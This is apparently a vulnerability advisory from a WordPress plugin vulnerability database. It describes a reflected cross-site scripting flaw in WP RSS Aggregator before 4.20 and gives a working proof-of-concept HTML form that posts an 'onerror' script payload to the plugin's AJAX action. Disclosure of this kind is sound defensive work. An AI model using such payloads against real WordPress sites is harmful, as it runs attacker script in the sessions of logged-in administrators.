WordPress Plugin Vulnerabilities
WP RSS Aggregator < 4.20 - Reflected Cross-Site Scripting (XSS)
Description
The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting
Proof of Concept
Save the HTML below to a file with the .html extension, then open it in Firefox, while being authenticated in a separate tab to a WordPress site with the plugin installed. <html> <form action="http://example.com/wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action" method="POST"> <input type="text" value="<html><img src onerror=alert(`XSS`)>" name="id"> <input type="submit" value="Send"> </form> </html>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-26 (about 2 years ago)
Added
2022-01-26 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)